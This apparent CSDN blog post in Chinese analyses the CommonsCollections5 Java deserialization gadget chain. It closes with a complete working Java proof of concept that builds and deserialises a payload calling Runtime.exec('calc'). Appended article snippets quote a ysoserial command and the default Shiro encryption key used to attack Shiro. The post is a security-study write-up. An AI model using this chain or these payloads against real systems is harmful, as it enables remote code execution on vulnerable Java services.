CommonsCollections5分析

最新推荐文章于 2023-12-07 12:00:00 发布
最新推荐文章于 2023-12-07 12:00:00 发布
阅读量417 收藏
点赞数
文章标签: class 反射 spark hashmap rpc
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43818995/article/details/122283567
版权

CommonsCollections5

调用链

BadAttributeValueExpException.readObject()
    |
TiedMapEntry.toString()
    |
LazyMap.get()
    |
ChainedTransformer.transform()
    |
ConstantTransformer.transform()
    |
InvokerTransformer.transform()
    |
Runtime.exec()

Ysoserial调用链

/*
    Gadget chain:
        ObjectInputStream.readObject()
            BadAttributeValueExpException.readObject()
                TiedMapEntry.toString()
                    LazyMap.get()
                        ChainedTransformer.transform()
                            ConstantTransformer.transform()
                            InvokerTransformer.transform()
                                Method.invoke()
                                    Class.getMethod()
                            InvokerTransformer.transform()
                                Method.invoke()
                                    Runtime.getRuntime()
                            InvokerTransformer.transform()
                                Method.invoke()
                                    Runtime.exec()

    Requires:
        commons-collections
 */

一些类的分析

TiedMapEntry类分析

 这里接收两个值分别赋给map和key

 这里可以可以传入Lazy.map()进行触发

 下来跟触发getValue()的地方

 再紧接着找调用toStirng()的地方 下来就得跟进另一个新的类BadAttributeValueExpException

BadAttributeValueExpException类分析

注意此类的构造函数中 传入值再序列化的时候会触发toString 所以需要再序列化阶段置空它 后续可以使用反射进行传进来

 这个类的readObject()中调用了此类 这里再72行获取val中的值 再86行进行了调用

最终poc

package com.test;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;
import org.apache.commons.collections4.keyvalue.TiedMapEntry;

import javax.management.BadAttributeValueExpException;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.HashMap;

public class cc5 {
    public static void main(String[] args) throws ClassNotFoundException, NoSuchFieldException, IllegalAccessException {
        ChainedTransformer chain = new ChainedTransformer(new Transformer[] {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[] {
                        String.class, Class[].class }, new Object[] {
                        "getRuntime", new Class[0] }),
                new InvokerTransformer("invoke", new Class[] {
                        Object.class, Object[].class }, new Object[] {
                        null, new Object[0] }),
                new InvokerTransformer("exec",
                        new Class[] { String.class }, new Object[]{"calc"})});
        HashMap innermap = new HashMap();
        LazyMap map = (LazyMap)LazyMap.decorate(innermap,chain);
        TiedMapEntry tiedmap = new TiedMapEntry(map,123);
        BadAttributeValueExpException poc = new BadAttributeValueExpException(1);
        Field val = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val");
        val.setAccessible(true);
        val.set(poc,tiedmap);

        try{
            ObjectOutputStream outputStream = new ObjectOutputStream(new FileOutputStream("./cc5"));
            outputStream.writeObject(poc);
            outputStream.close();

            ObjectInputStream inputStream = new ObjectInputStream(new FileInputStream("./cc5"));
            inputStream.readObject();
        }catch(Exception e){
            e.printStackTrace();
        }
    }
}

参考学习

1

笑花大王
关注
Java反序列化(七)Common Collection 5分析
Vicl1fe的博客
06-04 346
前言 环境 jdk1.7 Commons Collections 3.1 <dependency> <groupId>commons-collections</groupId> <artifactId>commons-collections</artifactId> <version>3.1</version> </dependency> 利用链 Objec
Java反序列化(十一)CommonCollectionsK1分析及在Shiro中的利用
Vicl1fe的博客
10-24 1058
前言 在Shiro中的利用可真是复杂 利用CC6攻击Shiro 使用CC6链生成payload,进行利用。shiro 1.2.4以下默认使用密钥为kPH+bIxk5D2deZiIxcaaaA==。 通过yso获取序列化对象。 java -jar ysoserial.jar CommonsCollections6 "calc.exe" > result.ser 然后通过Serfile_to_rememberme.py生成payload。 python3 Serfile_to_rememberme.py
[JAVA反序列化初学3]Commons-Collections5利用链分析
GX233的博客
03-24 5186
[JAVA反序列化]Commons-Collections5利用链分析
Java安全—CommonsCollections5
XINO
08-17 756
今天给大家带来的是CC5链的构造分析,也是基本按照CC1走下来的,只是后面的部分不太一样。希望大家有所收获。
CommonCollections5链分析
Demodd的博客
03-20 4705
前言 ​ 本文直接跟着前面文章写了,没有描述前部分poc的内容 正文 看一下cc5的Gadget Gadget chain: ObjectInputStream.readObject() BadAttributeValueExpException.readObject() TiedMapEntry.toString() LazyMap.get() Chaine
java--CommonsCollections5学习
zyer
05-30 280
cc5和cc6差不多,主要都是利用TideMapEntry从而利用LazyMap调用get方法,而LazyMap的get方法需要的参数是LazyMap中没有的值才会触发LazyMap的transform的put方法。 TiedMapEntry 主要使用的是LazyMap的get方法,那么在这里我们可以看到其中getValue,hashCode,equals,toString都可以触发 那么下面我们需要寻找一个可以输入TideMapEntry这个类,并且可以触发这些函数之一的一个类。 BadAtt
Java反序列化漏洞Apache CommonsCollections分析
洋洋的小黑屋
05-17 554
Java反序列化漏洞Apache CommonsCollections分析 cc链,既为Commons-Collections利用链。此篇文章为cc链的第一条链CC1。而CC1目前用的比较多的有两条链,LazyMap和TransformedMap。在ysoserial工具中,利用的是LazyMap链,而我们此篇分析的则是TransformedMap链。 1.本文所需前置知识 java反序列化基础...
ysoserial CommonsColletions5分析
洋洋的小黑屋
07-10 149
我们知道,AnnotationInvocationHandler类在JDK8u71版本以后,官方对readobject进行了改写。 所以要挖掘出一条能替代的类BadAttributeValueExpException 在CC5中除了有一个新的类BadAttributeValueExpException外,还有一个新的类TiedMapEntry,用来调用LazyMap的get方法 TiedMapEntry 在TiedMapEntry的getValue方法中调用了get方法 而map成员变量则是由构造函数传入
p牛java安全漫谈学习笔记(3)_CommonsCollections1(cc1)分析
qq_35976649的博客
04-06 4392
cc1链(jdk6) 简化cc1-仿 使用p牛的简化cc1进行分析: package ysoserial.payloads; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import
Commons-Collections1链分析
weixin_45682070的博客
01-04 790
条件限制: ​JDK版本:jdk1.8以前(8u71之后已修复不可利用) CC版本:Commons-Collections 3.1-3.2.1 环境搭建: <dependencies> <dependency> <groupId>commons-collections</groupId> <artifactId>commons-collections</artifactId&g
commons-collections
04-23
collections jar 包集合,使用Maven的可以直接使用!collections
[Java反序列化]—CommonsCollections5
Sentiment的博客
06-04 614
CC5其实就是CC1的一种变形,CC1是通过获取,而CC5则是通过,其余部分都是一样的可以前后对比下CC1: CC5: 分析 先看下中如何调用的本类中有个方法调用了 而中调用了 再通过构造器将赋为即可回到CC1的后半部分 所以接下来看谁调用了,在类中的中发现调用 调用的是,所以现在要做的就是如何将构造成,看下从哪来的 先调用从流中读取了所有的持久化字段,然后调用方法得到了名字是的字段。所以可以通过修改的值,来修改,而是本类中的一个私有属性,直接反射......
java反序列化 exp_java反序列化Commons-Collections5分析
weixin_42522400的博客
02-25 134
BadAttributeValueExceptionpackage org.lain.poc;import org.apache.commons.collections.Transformer;import org.apache.commons.collections.functors.ChainedTransformer;import org.apache.commons.collections...
Java安全之Commons Collections5
最新发布
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
12-07 629
【代码】Java安全之Commons Collections5。
Java代码审计——Commons Collections5 BadAttributeValueExpException
王嘟嘟的博客
12-02 1246
0x00 前言 反序列化总纲 cc链无非就是不同的调用拼接在一起形成的,比如cc5就是在cc1的基础上进行调用调整的。 0x01 BadAttributeValueExpException 在LazyMap的基础上,发现了一个新的调用方式,就是通过 TiedMapEntry+BadAttributeValueExpException的方式进行调用的。 在之前,我们知道LazyMap需要调用get方法才可以触发,那么我们的主题就是如果去触发LazyMap的get方法。 1.TiedMapEntry 首先来看这
[Java反序列化]CommonsCollections5利用链学习
feng的博客
08-16 881
前言 奇奇怪怪的就把CC5给看了。在看一个师傅的CC1的文章的时候,发现他写的LazyMap链不太一样,我以为是CC1的新链,然后也学习了一波,然后查了一下发现是CC5。。。 环境 <dependency> <groupId>commons-collections</groupId> <artifactId>commons-collections</artifactId>
apache-commons-collections5反序列化链分析
12-02 741
apache-commons-collections5反序列化链分析 apache-commons-collections5反序列化链就是ACC1 LazyMap攻击链的利用,都是学过的知识点 复现环境 JDK7+CommonsCollections1 漏洞分析 看到CommonsCollections5类的getObject方法,实例化transformerChain类,并进行占位,后面再反射赋值为Transformer数组,Transformer数组很熟悉,构造跟ACC1链一样,Transform
odbc 函数序列错误_Java反序列化利用链分析CommonsCollections5,6,7,9,10
weixin_39600331的博客
11-29 310
0x00 前言本文继续分析CommonsCollections:3.1的相关反序列化利用链,这次主要分析CommonsCollections5,6,7,9,以及我找的一个新利用链,这里暂且将其称为10.0x01 环境准备CommonsCollections5,6,7,10用的还是commons-collections:3.1,jdk用7或8都可以。CommonsCollections...
CommonsCollections7反序列化链攻击利用深度解析
本文档主要介绍了 CommonsCollections7 中的反序列化链学习,特别是针对 Hashtable 类的深入理解与POC利用。Hashtable 是 Java 集合框架中的一个重要组成部分,它实现了 Map 接口并支持 Serializable 接口,这意味着...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值